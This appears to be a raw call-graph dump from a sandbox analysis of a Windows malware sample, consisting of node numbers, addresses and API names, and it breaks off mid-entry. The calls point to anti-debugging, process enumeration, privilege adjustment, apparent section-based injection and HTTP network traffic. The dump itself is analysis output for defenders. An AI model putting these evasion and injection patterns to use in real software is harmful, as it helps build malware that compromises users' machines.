25420->25423 25421 286d21c 25424 2862b90 RegOpenKeyExA 25421->25424 25422->25421 25426 288dc1d GetFileAttributesW 25422->25426 25423->25422 25425 286d22e 25424->25425 25427 2862b90 RegOpenKeyExA 25425->25427 25426->25421 25428 286d243 25427->25428 25429 2862b90 RegOpenKeyExA 25428->25429 25430 286d258 25429->25430 25430->25294 25431->25296 25433 286522e 25432->25433 25434 28651fe 25432->25434 25433->25391 25434->25433 25435 2865215 GetPEB 25434->25435 25435->25433 25437 2862bb1 25436->25437 25437->25400 25439 286286e 25438->25439 25440 286281d 25438->25440 25439->25402 25440->25439 25441 2862848 RegQueryValueExA RegCloseKey 25440->25441 25441->25439 25443 286532b 25442->25443 25447 2865335 25442->25447 25444 2865362 GetSystemInfo 25443->25444 25443->25447 25445 2865376 25444->25445 25446 2862b90 RegOpenKeyExA 25445->25446 25445->25447 25446->25445 25447->25407 25449 28640e9 25448->25449 25451 2864123 25448->25451 25450 2862802 2 API calls 25449->25450 25450->25451 25451->25412 25453 286e9ba 25452->25453 25454 286e9e9 25453->25454 25632 2863ea9 25453->25632 25454->25301 25641 2888645 25456->25641 25458 286ea05 25458->25305 25459 286ea01 25459->25458 25460 2863145 2 API calls 25459->25460 25461 286ead6 25460->25461 25470 286eb38 25461->25470 25694 288a855 RtlFreeHeap 25461->25694 25463 2888b35 3 API calls 25464 286ec77 25463->25464 25662 2888b35 25464->25662 25466 286ecb3 25467 2888b35 3 API calls 25466->25467 25468 286ece2 25467->25468 25469 2888b35 3 API calls 25468->25469 25471 286ed0e 25469->25471 25470->25463 25470->25464 25472 2888b35 3 API calls 25471->25472 25473 286ed3a 25472->25473 25474 2888b35 3 API calls 25473->25474 25475 286ed66 25474->25475 25476 2888b35 3 API calls 25475->25476 25477 286ed8b 25476->25477 25478 2888b35 3 API calls 25477->25478 25479 286edb7 25478->25479 25480 2888b35 3 API calls 25479->25480 25481 286ede3 25480->25481 25482 2888b35 3 API calls 25481->25482 25483 286ee0f 25482->25483 25484 2888b35 3 API calls 25483->25484 25485 286ee39 25484->25485 25486 2888b35 3 API calls 25485->25486 25487 286ee65 25486->25487 25488 2888b35 3 API calls 25487->25488 25489 286ee91 25488->25489 25490 2888b35 3 API calls 25489->25490 25491 286eebd 25490->25491 25492 2888b35 3 API calls 25491->25492 25494 286eef7 25492->25494 25493 286ef2f 25495 2888b35 3 API calls 25493->25495 25494->25493 25496 2888b35 3 API calls 25494->25496 25497 286ef5e 25495->25497 25496->25493 25498 2888b35 3 API calls 25497->25498 25499 286ef8a 25498->25499 25500 2888b35 3 API calls 25499->25500 25501 286efb6 25500->25501 25502 2888b35 3 API calls 25501->25502 25503 286efe2 25502->25503 25504 2888b35 3 API calls 25503->25504 25505 286f00c 25504->25505 25506 2888b35 3 API calls 25505->25506 25507 286f04b 25506->25507 25508 2888b35 3 API calls 25507->25508 25509 286f079 25508->25509 25510 2888b35 3 API calls 25509->25510 25511 286f0a5 25510->25511 25512 2888b35 3 API calls 25511->25512 25513 286f0d1 25512->25513 25514 2888b35 3 API calls 25513->25514 25515 286f0fd 25514->25515 25516 2888b35 3 API calls 25515->25516 25517 286f137 25516->25517 25518 2888b35 3 API calls 25517->25518 25519 286f165 25518->25519 25520 2888b35 3 API calls 25519->25520 25521 286f191 25520->25521 25522 2888b35 3 API calls 25521->25522 25523 286f1bd 25522->25523 25524 2888b35 3 API calls 25523->25524 25525 286f1e9 25524->25525 25526 2888b35 3 API calls 25525->25526 25527 286f215 25526->25527 25528 2888b35 3 API calls 25527->25528 25529 286f241 25528->25529 25530 2888b35 3 API calls 25529->25530 25531 286f26d 25530->25531 25532 2888b35 3 API calls 25531->25532 25533 286f299 25532->25533 25534 2888b35 3 API calls 25533->25534 25535 286f2c5 25534->25535 25536 2888b35 3 API calls 25535->25536 25537 286f2ef 25536->25537 25538 2888b35 3 API calls 25537->25538 25539 286f319 25538->25539 25540 2888b35 3 API calls 25539->25540 25541 286f345 25540->25541 25542 2888b35 3 API calls 25541->25542 25543 286f391 25541->25543 25542->25543 25546 2888b35 3 API calls 25543->25546 25548 286f3d3 25543->25548 25544 286f544 25666 2889d40 25544->25666 25546->25548 25547 286f420 25552 286f494 25547->25552 25558 286f431 25547->25558 25548->25547 25549 286f49a 25548->25549 25695 287d8d6 RegQueryValueExA RegCloseKey 25548->25695 25549->25544 25554 2888b35 3 API calls 25549->25554 25551 286f3ff 25551->25547 25555 2865e00 3 API calls 25551->25555 25696 2873a9e GetPriorityClass SetPriorityClass SetPriorityClass 25552->25696 25554->25544 25555->25547 25558->25549 25560 2888b35 3 API calls 25558->25560 25560->25549 25561 286fa62 25562 286fb82 25561->25562 25563 286fb5c 25561->25563 25565 286fb9c 25562->25565 25568 286fb91 25562->25568 25686 2874c93 25563->25686 25566 286fb9a 25565->25566 25571 2888f54 3 API calls 25565->25571 25570 286fb7a 25566->25570 25572 2888f54 3 API calls 25566->25572 25567 286fb61 25690 2888f54 25567->25690 25697 2888f80 25568->25697 25570->25458 25574 28617e4 RtlFreeHeap 25570->25574 25573 286fbb7 25571->25573 25576 286fbea 25572->25576 25577 2888f54 3 API calls 25573->25577 25574->25458 25578 2888f54 3 API calls 25576->25578 25579 286fbc6 25577->25579 25580 286fbf9 25578->25580 25582 2888f54 3 API calls 25579->25582 25581 2888f54 3 API calls 25580->25581 25583 286fc08 25581->25583 25582->25566 25584 286fc1a 25583->25584 25585 2888f54 3 API calls 25583->25585 25584->25570 25586 2888f54 3 API calls 25584->25586 25585->25584 25586->25570 25587 286f54e 25587->25458 25670 28892d6 25587->25670 25589 2863f4b 25588->25589 25591 2863f87 25589->25591 25712 2862ac0 25589->25712 25592 2862802 2 API calls 25591->25592 25593 2863fad 25591->25593 25592->25593 25593->25307 25716 288c43e 25594->25716 25597 287d740 25597->25308 25600 287d6da 25725 288c4ab RtlFreeHeap 25600->25725 25602 288c43e 3 API calls 25601->25602 25603 2874fd0 25602->25603 25604 286dead 25603->25604 25746 288c2b6 RtlFreeHeap 25603->25746 25608 288cee2 25604->25608 25607 2874fe1 25747 288c4ab RtlFreeHeap 25607->25747 25609 288c43e 3 API calls 25608->25609 25610 288cef6 25609->25610 25611 288cf6a 25610->25611 25748 288c2b6 RtlFreeHeap 25610->25748 25611->25314 25613 288cf63 25750 288c4ab RtlFreeHeap 25613->25750 25615 288cf01 25615->25613 25749 288ca64 RtlFreeHeap 25615->25749 25617 288cf4b 25618 28617e4 RtlFreeHeap 25617->25618 25618->25613 25620 2865e00 3 API calls 25619->25620 25621 2884465 25620->25621 25622 288448c 25621->25622 25623 288446b Sleep 25621->25623 25622->25319 25751 2865bed 25623->25751 25626 2884524 25625->25626 25627 286df6f 25626->25627 25754 288449d 25626->25754 25627->25323 25629->25298 25630->25316 25631->25313 25633 2863eb5 25632->25633 25636 2863ebf 25632->25636 25634 2863eea 25633->25634 25633->25636 25637 2863ef6 25633->25637 25634->25636 25639 286668f RtlFreeHeap 25634->25639 25636->25454 25637->25636 25640 286668f RtlFreeHeap 25637->25640 25639->25636 25640->25636 25642 288864e 25641->25642 25643 2888652 25641->25643 25642->25459 25644 288869a 25643->25644 25645 28886a7 25643->25645 25647 28886a5 25643->25647 25646 28617e4 RtlFreeHeap 25644->25646 25648 28886ba 25645->25648 25649 28886e1 25645->25649 25646->25647 25647->25459 25650 28617e4 RtlFreeHeap 25648->25650 25653 2888781 25649->25653 25658 288870a 25649->25658 25651 28886c5 25650->25651 25652 28617e4 RtlFreeHeap 25651->25652 25652->25647 25654 28617e4 RtlFreeHeap 25653->25654 25656 2888791 25654->25656 25655 2888739 25655->25459 25657 28617e4 RtlFreeHeap 25656->25657 25657->25655 25658->25655 25659 28617e4 RtlFreeHeap 25658->25659 25660 2888766 25659->25660 25661 28617e4 RtlFreeHeap 25660->25661 25661->25655 25663 2888b42 25662->25663 25664 2888b3c 25662->25664 25663->25466 25664->25663 25665 2888f80 3 API calls 25664->25665 25665->25663 25668 2889d52 25666->25668 25667 2889d58 25667->25587 25668->25667 25669 28617e4 RtlFreeHeap 25668->25669 25669->25667 25677 28892ea 25670->25677 25671 286fa59 25678 288c5f6 25671->25678 25672 2889407 25706 288900b RtlFreeHeap 25672->25706 25675 2889411 25676 28617e4 RtlFreeHeap 25675->25676 25676->25671 25677->25671 25677->25672 25700 28890b6 25677->25700 25679 288c614 25678->25679 25680 286171c RtlFreeHeap 25679->25680 25685 288c78b 25679->25685 25682 288c741 25680->25682 25681 28617e4 RtlFreeHeap 25681->25685 25682->25681 25683 288c92c 25683->25561 25684 28617e4 RtlFreeHeap 25684->25683 25685->25683 25685->25684 25687 2874c9f 25686->25687 25688 2888b35 3 API calls 25687->25688 25689 2874cff 25687->25689 25688->25689 25689->25567 25691 2888f65 25690->25691 25692 2888f77 25691->25692 25693 2888f80 3 API calls 25691->25693 25692->25570 25693->25692 25694->25470 25695->25551 25696->25549 25707 2888f9a GetPriorityClass 25697->25707 25701 28890c8 25700->25701 25705 288910d 25700->25705 25702 288913a CreateFileW 25701->25702 25701->25705 25703 2889162 CreateFileMappingW 25702->25703 25702->25705 25704 288918a MapViewOfFile 25703->25704 25703->25705 25704->25705 25705->25677 25706->25675 25708 2888fb9 SetPriorityClass 25707->25708 25709 2888fc7 25707->25709 25708->25709 25710 2888ff8 SetPriorityClass 25709->25710 25711 2888f94 25709->25711 25710->25711 25711->25566 25713 2862acc 25712->25713 25715 2862aff 25712->25715 25714 2862ae1 RegCreateKeyExA 25713->25714 25713->25715 25714->25715 25715->25589 25717 288c44a 25716->25717 25719 287d6cc 25717->25719 25726 2862de3 25717->25726 25719->25597 25724 288c2b6 RtlFreeHeap 25719->25724 25720 288c45c 25720->25719 25732 2862ec7 25720->25732 25723 28617e4 RtlFreeHeap 25723->25719 25724->25600 25725->25597 25727 2862ea6 25726->25727 25728 2862df8 25726->25728 25727->25720 25728->25727 25729 28617e4 RtlFreeHeap 25728->25729 25730 2862e7f 25729->25730 25738 2862a42 25730->25738 25733 2862fb7 25732->25733 25734 2862edd 25732->25734 25733->25719 25733->25723 25734->25733 25735 28617e4 RtlFreeHeap 25734->25735 25736 2862f86 25735->25736 25742 28629bc 25736->25742 25739 2862a56 25738->25739 25740 2862a85 25738->25740 25739->25740 25741 2862a62 RegCreateKeyExA 25739->25741 25740->25727 25741->25740 25743 2862a3b 25742->25743 25744 28629d7 25742->25744 25743->25733 25744->25743 25745 2862a23 RegCloseKey 25744->25745 25745->25743 25746->25607 25747->25604 25748->25615 25749->25617 25750->25611 25752 2865c17 25751->25752 25753 2865bfb NtSetInformationThread 25751->25753 25752->25622 25753->25752 25755 288450a 25754->25755 25756 28844ab 25754->25756 25755->25626 25756->25755 25757 28844fa PostMessageA 25756->25757 25757->25755 25781 286d39f 25758->25781 25762 286d4da 25762->25333 25764 288d9bb OpenServiceW 25763->25764 25765 288d9b4 25763->25765 25764->25765 25765->25335 25767 2877b09 25766->25767 25771 2877b02 25766->25771 25772 2877b44 25767->25772 25799 28777e4 RtlFreeHeap GetFileAttributesW 25767->25799 25769 2877c07 25770 288dc1d GetFileAttributesW 25769->25770 25769->25771 25770->25771 25771->25339 25772->25769 25772->25771 25773 288dc1d GetFileAttributesW 25772->25773 25773->25769 25775 2867b5c 25774->25775 25776 2867a7a 25774->25776 25775->25340 25776->25775 25800 28679df 25776->25800 25778 2867ab8 25779 2862722 2 API calls 25778->25779 25780 2867b57 25779->25780 25780->25340 25782 286d3ad 25781->25782 25790 286d3c2 Sleep 25782->25790 25791 2874831 25782->25791 25787 286d493 SleepEx FindCloseChangeNotification 25787->25790 25788 286d4ac 25789 28617e4 RtlFreeHeap 25788->25789 25789->25790 25790->25762 25792 287485c 25791->25792 25793 286d472 25792->25793 25794 28617e4 RtlFreeHeap 25792->25794 25793->25790 25795 2865d65 25793->25795 25794->25793 25796 2865d79 25795->25796 25798 2865d72 25795->25798 25797 2865d91 CreateThread 25796->25797 25797->25798 25798->25787 25798->25788 25799->25772 25801 28679fb 25800->25801 25802 2867a65 25801->25802 25807 2862b27 25801->25807 25802->25778 25805 2862b27 RegCreateKeyExW 25806 2867a5f 25805->25806 25806->25778 25808 2862b34 25807->25808 25810 2862b66 25807->25810 25809 2862b46 RegCreateKeyExW 25808->25809 25808->25810 25809->25810 25810->25805 25812 286857c 25811->25812 25813 286857f 25811->25813 25812->25345 25814 28617e4 RtlFreeHeap 25813->25814 25815 28685a0 25813->25815 25814->25815 25815->25345 25816->25367 25817->25367 25819 28645c5 25818->25819 25821 28645bd 25818->25821 25820 28645f5 CreateFileA 25819->25820 25820->25821 25822 286460e 25820->25822 25821->25162 25823 286463d CreateFileA 25822->25823 25823->25821 25825 286398d 25824->25825 25834 2863997 25824->25834 25826 28639b7 CreateToolhelp32Snapshot 25825->25826 25825->25834 25827 28639c8 25826->25827 25826->25834 25828 28639d7 Thread32First 25827->25828 25829 28639fc 25828->25829 25828->25834 25830 2863a17 Thread32Next 25829->25830 25831 2863a26 FindCloseChangeNotification 25829->25831 25830->25829 25830->25831 25832 2863a31 25831->25832 25831->25834 25833 28617e4 RtlFreeHeap 25832->25833 25833->25834 25834->25188 25837 2865b12 25835->25837 25836 2865b3f 25836->25188 25837->25836 25839 286668f RtlFreeHeap 25837->25839 25839->25836 25840->25197 25841->25193 25842->25192 25844 2865ab3 25843->25844 25846 2865aaf 25843->25846 25844->25846 25847 286668f RtlFreeHeap 25844->25847 25846->25213 25847->25846 25849 2866f10 25848->25849 25850 2865e00 3 API calls 25849->25850 25851 2866f3c Sleep 25849->25851 25850->25851 25851->25074 25853 2862fda 2 API calls 25852->25853 25854 2863197 25853->25854 25854->25226 25856 28791a5 25855->25856 25864 287946f 25855->25864 25857 2879436 25856->25857 25861 2879230 CreateFileW 25856->25861 25856->25864 25858 2879455 25857->25858 25859 28617e4 RtlFreeHeap 25857->25859 25860 2879461 25858->25860 25895 2861caf RtlFreeHeap 25858->25895 25859->25858 25863 28617e4 RtlFreeHeap 25860->25863 25860->25864 25861->25860 25865 2879259 25861->25865 25863->25864 25864->25228 25865->25857 25894 2861b93 RtlFreeHeap 25865->25894 25867 28792b5 25867->25857 25868 286171c RtlFreeHeap 25867->25868 25869 28617e4 RtlFreeHeap 25867->25869 25868->25867 25869->25867 25872 2879af4 25870->25872 25880 2879891 25870->25880 25871 28617e4 RtlFreeHeap 25871->25872 25872->25235 25873 2879ac4 25874 28617e4 RtlFreeHeap 25873->25874 25875 2879acc 25874->25875 25876 2879ada 25875->25876 25877 28617e4 RtlFreeHeap 25875->25877 25878 2879ae8 25876->25878 25879 28617e4 RtlFreeHeap 25876->25879 25877->25876 25878->25871 25878->25872 25879->25878 25880->25872 25880->25873 25880->25878 25881 288dc1d GetFileAttributesW 25880->25881 25882 28799cc 25881->25882 25883 288dc1d GetFileAttributesW 25882->25883 25884 28799dc 25882->25884 25883->25884 25884->25873 25896 2879787 25884->25896 25887 2879787 2 API calls 25888 2879a68 25887->25888 25889 2879787 2 API calls 25888->25889 25890 2879aa8 25889->25890 25891 2879787 2 API calls 25890->25891 25891->25873 25892->25228 25893->25235 25894->25867 25895->25860 25897 287979d 25896->25897 25901 287986f 25896->25901 25898 28797dc GetPrivateProfileSectionNamesW 25897->25898 25897->25901 25899 2879867 25898->25899 25903 28797ee 25898->25903 25900 28617e4 RtlFreeHeap 25899->25900 25900->25901 25901->25887 25903->25899 25904 28795c9 RtlFreeHeap 25903->25904 25904->25903 25905->25250 25906->25253 25907->25251 25908->25251 25910 2870d46 25909->25910 25911 288524a 2 API calls 25910->25911 25916 2870d5c 25910->25916 25913 2870d6c 25911->25913 25913->25916 25972 2885420 25913->25972 25914 2870d86 25914->25916 25979 288575c 25914->25979 25916->25264 25918 2865e00 3 API calls 25917->25918 25920 288561c 25918->25920 25919 2870858 25922 288543c 25919->25922 25920->25919 25921 2885633 FindCloseChangeNotification 25920->25921 25921->25919 25923 2885463 25922->25923 25924 288548f CreateFileW 25923->25924 25933 2885515 25923->25933 25926 28854b0 25924->25926 25924->25933 25925 28854e3 25927 28617e4 RtlFreeHeap 25925->25927 25929 28854e9 25925->25929 25926->25925 25928 28854cf ReadFile 25926->25928 25927->25929 25928->25925 25930 28617e4 RtlFreeHeap 25929->25930 25929->25933 25931 288551d 25930->25931 25983 2861768 RtlFreeHeap 25931->25983 25933->25276 25935 288525e 25934->25935 25936 2885305 getaddrinfo 25935->25936 25942 2885291 25935->25942 25947 28852f0 25935->25947 25937 288531f 25936->25937 25936->25947 25938 28853e3 25937->25938 25940 28617e4 RtlFreeHeap 25937->25940 25937->25947 25939 28853ed 25938->25939 25941 28617e4 RtlFreeHeap 25938->25941 25943 28617e4 RtlFreeHeap 25939->25943 25944 2885403 25939->25944 25940->25938 25941->25939 25945 28617e4 RtlFreeHeap 25942->25945 25942->25947 25943->25944 25946 28617e4 RtlFreeHeap 25944->25946 25944->25947 25945->25947 25946->25947 25947->25276 25949 287a8f5 25948->25949 25950 287a8f9 25948->25950 25949->25276 25984 2864199 25950->25984 25954 287a95f 25954->25276 25956 287a9b1 25955->25956 25957 287a9b5 25955->25957 25956->25276 25957->25956 25958 287a9fe InternetConnectA 25957->25958 25958->25956 25960 287abe8 25959->25960 25962 287adbe 25959->25962 25960->25962 25988 287b56d 25960->25988 25962->25276 25963 28617e4 RtlFreeHeap 25963->25962 25964 287ace7 25964->25962 25965 287ad1e HttpSendRequestA 25964->25965 25966 287adac 25964->25966 25968 287ad30 25965->25968 25966->25963 25967 28617e4 RtlFreeHeap 25967->25966 25968->25966 25970 287aed4 25968->25970 26003 287afa1 14 API calls 25968->26003 25970->25967 25971->25276 25973 2885424 25972->25973 25974 2885427 25972->25974 25973->25914 25975 2885433 25974->25975 25976 28617e4 RtlFreeHeap 25974->25976 25977 28617e4 RtlFreeHeap 25975->25977 25976->25975 25978 2885439 25977->25978 25978->25914 25980 2885767 25979->25980 25982 288577f 25979->25982 25981 288576d socket 25980->25981 25980->25982 25981->25982 25982->25916 25983->25933 25985 28641a4 25984->25985 25986 28641c0 InternetOpenA 25984->25986 25985->25986 25987 28641b4 ObtainUserAgentString 25985->25987 25986->25954 25987->25986 25989 287b586 25988->25989 25990 287b750 25988->25990 25989->25990 25991 287b5f6 25989->25991 25992 287b61d 25989->25992 25996 287b614 25989->25996 25990->25964 25991->25996 26028 287c229 RtlFreeHeap 25991->26028 25992->25996 26029 287bf6b RtlFreeHeap 25992->26029 26004 287bb6a 25996->26004 25997 287b72a 25998 28617e4 RtlFreeHeap 25997->25998 25998->25990 25999 287b6fc 25999->25997 26022 287b760 25999->26022 26001 287b6db 26001->25997 26001->25999 26030 287ba43 RtlFreeHeap 26001->26030 26003->25970 26005 287bb82 26004->26005 26021 287bcdd 26004->26021 26006 2863145 2 API calls 26005->26006 26005->26021 26007 287bbe0 26006->26007 26008 2863145 2 API calls 26007->26008 26009 287bbf3 26008->26009 26010 2863145 2 API calls 26009->26010 26011 287bc06 26010->26011 26012 2863145 2 API calls 26011->26012 26013 287bc19 26012->26013 26014 2863145 2 API calls 26013->26014 26015 287bc2c 26014->26015 26016 2863145 2 API calls 26015->26016 26017 287bc3f 26016->26017 26031 28656f5 26017->26031 26019 287bc51 26020 2862ec7 2 API calls 26019->26020 26020->26021 26021->26001 26023 287ba05 26022->26023 26025 287b777 26022->26025 26023->25997 26024 28617e4 RtlFreeHeap 26024->26023 26025->26023 26026 28617e4 RtlFreeHeap 26025->26026 26027 287b9f8 26025->26027 26026->26027 26027->26023 26027->26024 26028->25996 26029->25996 26030->25999 26032 2865702 26031->26032 26033 2865708 26031->26033 26032->26033 26034 2865724 GetTimeZoneInformation 26032->26034 26033->26019 26035 286573f 26034->26035 26035->26019 26058 2867ca5 13 API calls 24717 28660aa 24718 28660c1 24717->24718 24719 28660b7 24717->24719 24719->24718 24720 28660e5 NtSetInformationThread 24719->24720 24721 28660f8 24720->24721 24722 2866114 24721->24722 24723 28660fc 24721->24723 24737 2889fe6 Sleep 24722->24737 24750 28855d5 24722->24750 24754 288e7d9 24722->24754 24758 288a20e 24722->24758 24762 288e905 24722->24762 24774 28800ed 24722->24774 24724 28617e4 RtlFreeHeap 24723->24724 24724->24718 24725 286614b 24779 28617e4 24725->24779 24726 286611d 24726->24725 24730 28617e4 RtlFreeHeap 24726->24730 24730->24725 24783 2864c5d 24737->24783 24739 288a024 Sleep 24740 288a143 24739->24740 24745 288a00e 24739->24745 24740->24726 24743 288a20e 3 API calls 24743->24745 24744 288a0cf Sleep 24744->24745 24745->24739 24745->24740 24745->24743 24745->24744 24747 288a0f7 Sleep FindCloseChangeNotification 24745->24747 24787 288a7af 24745->24787 24791 288a294 24745->24791 24797 288a45c 24745->24797 24807 28834cf 24745->24807 24747->24745 24751 28855e2 24750->24751 24753 28855de 24750->24753 24873 288552b gethostname 24751->24873 24753->24726 24755 288e7e5 24754->24755 24756 288e815 CreateWindowExA 24755->24756 24757 288e833 24756->24757 24757->24726 24759 288a222 24758->24759 24760 288a227 24759->24760 24875 288383b 24759->24875 24760->24726 24764 288e91d 24762->24764 24773 288e916 24762->24773 24763 288e93c 24765 288e7d9 CreateWindowExA 24763->24765 24764->24763 24907 28846d8 RtlFreeHeap 24764->24907 24767 288e942 24765->24767 24768 288e9e8 24767->24768 24767->24773 24901 2862fda 24767->24901 24770 288ea02 DispatchMessageA 24768->24770 24771 288ea1e 24768->24771 24770->24768 24772 28617e4 RtlFreeHeap 24771->24772 24771->24773 24772->24773 24773->24726 24775 28800fe 24774->24775 24778 2880105 24774->24778 24775->24726 24776 288028c Sleep 24776->24778 24778->24775 24778->24776 24912 28802bf 24778->24912 24780 2861803 NtTerminateThread 24779->24780 24781 28617ed 24779->24781 24780->24718 24781->24780 24782 28617f7 RtlFreeHeap 24781->24782 24782->24780 24784 2864c79 24783->24784 24819 2864b40 24784->24819 24786 2864c88 24786->24745 24788 288a84e 24787->24788 24789 288a7c4 24787->24789 24788->24745 24789->24788 24790 288a845 RegCloseKey 24789->24790 24790->24788 24793 288a2b4 24791->24793 24792 288a35a 24792->24745 24793->24792 24829 2862bcc 24793->24829 24795 288a335 24796 2862bcc RtlFreeHeap 24795->24796 24796->24792 24798 288a47f 24797->24798 24799 288a548 CreateFileW 24798->24799 24805 288a484 24798->24805 24800 288a584 24799->24800 24800->24805 24834 288a365 24800->24834 24803 288a627 24806 28834cf 5 API calls 24803->24806 24805->24745 24806->24805 24808 28834e7 24807->24808 24810 2883528 24808->24810 24812 288363d Sleep 24808->24812 24852 28833de 24808->24852 24811 28667b5 RtlFreeHeap 24810->24811 24810->24812 24813 28835ba 24810->24813 24815 288357a 24811->24815 24812->24747 24813->24812 24861 28667b5 24813->24861 24815->24813 24867 286668f RtlFreeHeap 24815->24867 24817 28835fd 24817->24812 24868 286668f RtlFreeHeap 24817->24868 24820 2864c50 24819->24820 24821 2864b57 24819->24821 24820->24786 24821->24820 24822 2864bb0 GetTokenInformation 24821->24822 24823 2864bc5 24822->24823 24824 2864c42 24822->24824 24823->24824 24826 2864bde GetTokenInformation 24823->24826 24824->24820 24825 2864c47 FindCloseChangeNotification 24824->24825 24825->24820 24828 2864bf5 24826->24828 24827 28617e4 RtlFreeHeap 24827->24824 24828->24827 24830 2862bdc 24829->24830 24831 2862c61 24829->24831 24830->24831 24833 286668f RtlFreeHeap 24830->24833 24831->24795 24833->24831 24835 288a381 24834->24835 24845 288dc1d 24835->24845 24837 288a3ad 24838 288dc1d GetFileAttributesW 24837->24838 24839 288a40a 24838->24839 24848 288de6c 24839->24848 24842 288a456 24842->24805 24844 288365b RtlFreeHeap 24842->24844 24843 288a294 RtlFreeHeap 24843->24842 24844->24803 24846 288dc32 GetFileAttributesW 24845->24846 24847 288dc26 24845->24847 24846->24847 24847->24837 24849 288a44b 24848->24849 24850 288de7b 24848->24850 24849->24842 24849->24843 24850->24849 24851 288deaf DeleteFileW 24850->24851 24851->24849 24853 28833f4 24852->24853 24854 28833f9 24853->24854 24855 2883405 GetFileAttributesW 24853->24855 24854->24810 24856 2883419 SetFileAttributesW 24855->24856 24857 288342b CreateFileW 24855->24857 24856->24857 24858 288344f 24857->24858 24859 288345a SetFileAttributesW 24858->24859 24860 288346c 24858->24860 24859->24860 24860->24810 24862 28667c4 24861->24862 24863 28667ea 24862->24863 24869 286171c 24862->24869 24863->24817 24865 28667d3 24865->24863 24866 28617e4 RtlFreeHeap 24865->24866 24866->24863 24867->24813 24868->24812 24870 2861725 24869->24870 24871 2861729 24869->24871 24870->24865 24871->24870 24872 28617e4 RtlFreeHeap 24871->24872 24872->24870 24874 288554f 24873->24874 24874->24753 24878 288386b 24875->24878 24877 2883854 24877->24760 24879 28838a1 24878->24879 24880 288dc1d GetFileAttributesW 24879->24880 24881 288394c 24879->24881 24885 2883902 24879->24885 24880->24881 24882 28837c3 2 API calls 24881->24882 24884 2883a8b 24881->24884 24881->24885 24882->24884 24884->24885 24886 2883b41 24884->24886 24887 2883b83 24884->24887 24890 2883b68 24884->24890 24885->24877 24886->24890 24895 2862722 24886->24895 24888 2862722 2 API calls 24887->24888 24887->24890 24888->24890 24890->24885 24891 28837c3 24890->24891 24892 28837d1 24891->24892 24894 28837f5 24891->24894 24893 2862722 2 API calls 24892->24893 24892->24894 24893->24894 24894->24885 24896 2862791 24895->24896 24897 2862731 24895->24897 24896->24890 24897->24896 24898 2862742 RegCreateKeyExW 24897->24898 24898->24896 24899 2862760 24898->24899 24900 2862784 RegCloseKey 24899->24900 24900->24896 24902 28630ba 24901->24902 24903 2862ff3 24901->24903 24902->24768 24903->24902 24904 28617e4 RtlFreeHeap 24903->24904 24905 28630a3 24904->24905 24905->24902 24908 286295b 24905->24908 24907->24763 24909 286296a 24908->24909 24911 2862994 24908->24911 24910 2862976 RegCreateKeyExA 24909->24910 24909->24911 24910->24911 24911->24902 24913 28802ed 24912->24913 24914 2880301 CreateToolhelp32Snapshot 24913->24914 24919 2880340 24913->24919 24915 2880315 24914->24915 24914->24919 24916 288032c Process32FirstW 24915->24916 24924 2863d40 24915->24924 24916->24919 24920 2880350 24916->24920 24918 288048e Process32NextW 24918->24919 24918->24920 24919->24778 24920->24918 24930 288ad40 24920->24930 24936 2881aaa 24920->24936 24965 28739f1 RtlFreeHeap 24920->24965 24925 2863d52 24924->24925 24927 2863d4e 24924->24927 24926 2863d67 LookupPrivilegeValueA 24925->24926 24925->24927 24926->24927 24928 2863d8b AdjustTokenPrivileges 24926->24928 24927->24916 24928->24927 24929 2863db4 FindCloseChangeNotification 24928->24929 24929->24927 24931 288ad52 24930->24931 24932 288ad4e 24930->24932 24931->24932 24966 28644a2 24931->24966 24932->24920 24937 2881abc 24936->24937 24940 2881b95 24937->24940 24964 2881aca 24937->24964 25000 2863e38 RtlFreeHeap 24937->25000 24939 2881be6 24941 28821b7 VirtualFree 24939->24941 24945 28821c7 24939->24945 24940->24939 24942 2864c5d 4 API calls 24940->24942 24940->24964 24941->24945 24943 2881c16 24942->24943 24943->24939 24944 28644a2 NtQueryInformationProcess 24943->24944 24948 2881c30 24944->24948 24946 28617e4 RtlFreeHeap 24945->24946 24945->24964 24946->24964 24947 2881c55 24947->24939 24956 2881d0b 24947->24956 24977 2864cd0 24947->24977 24948->24939 24948->24947 24971 28644f0 24948->24971 24951 2881c78 24980 2864e69 24951->24980 24956->24939 24989 2880d68 24956->24989 24957 2881e56 24957->24939 24995 288058a 24957->24995 24960 2881f87 24961 288211d VirtualFree 24960->24961 24962 2882136 24961->24962 24963 28617e4 RtlFreeHeap 24962->24963 24963->24964 24964->24920 24965->24920 24967 28644af 24966->24967 24968 28644bb 24966->24968 24967->24968 24969 28644c0 NtQueryInformationProcess 24967->24969 24968->24932 24970 288adb6 7 API calls 24968->24970 24969->24968 24970->24932 24972 2864547 24971->24972 24973 28644fe 24971->24973 24972->24947 24974 2864510 NtQueryInformationProcess 24973->24974 24974->24972 24975 2864529 24974->24975 24975->24972 24976 286452e NtQueryInformationProcess 24975->24976 24976->24972 25002 2864d86 24977->25002 24979 2864ce3 24979->24951 24981 2864e76 24980->24981 24982 2864ee1 24980->24982 24981->24982 24983 2864ee7 24981->24983 24984 2864e83 24981->24984 24982->24956 25001 287ff99 RtlFreeHeap 24982->25001 25010 2864def RtlFreeHeap 24983->25010 24984->24982 24986 2864e9a NtQueryInformationProcess 24984->24986 24988 2864eb3 24986->24988 24987 28617e4 RtlFreeHeap 24987->24982 24988->24987 24990 2880d98 24989->24990 24991 2880d74 24989->24991 24990->24957 24991->24990 24992 2880e09 NtCreateSection 24991->24992 24994 2880e38 24992->24994 24993 2880f2e NtClose 24993->24990 24994->24990 24994->24993 24996 2880717 24995->24996 24997 288059b 24995->24997 24996->24939 24996->24960 24997->24996 24998 28806f3 DuplicateHandle 24997->24998 24998->24996 24999 288070e FindCloseChangeNotification 24998->24999 24999->24996 25000->24940 25001->24956 25003 2864d9f 25002->25003 25004 2864d9b 25002->25004 25006 2864d45 25003->25006 25004->24979 25007 2864d55 25006->25007 25008 2864d7b 25006->25008 25009 2864d62 NtQueryInformationProcess 25007->25009 25008->25004 25009->25008 25010->24982 26105 28771b2 RtlFreeHeap RegCreateKeyExA RegCloseKey ObtainUserAgentString 26108 288bdb3 RtlFreeHeap getaddrinfo socket 26109 28725ba 15 API calls 26067 28868ce RtlFreeHeap NtQueryInformationProcess 24709 2881beb RtlFreeHeap VirtualFree 26120 2870d04 PostMessageA 26122 288d102 RtlFreeHeap RegCloseKey CreateThread FindCloseChangeNotification 26078 2884004 14 API calls 26123 287e30a RtlFreeHeap RegCloseKey 26124 288d11b 11 API calls 26081 287e210 GetPriorityClass SetPriorityClass SetPriorityClass 25013 288eb26 25014 288eb8b 25013->25014 25016 288eb3d 25013->25016 25015 288ebcc 25014->25015 25018 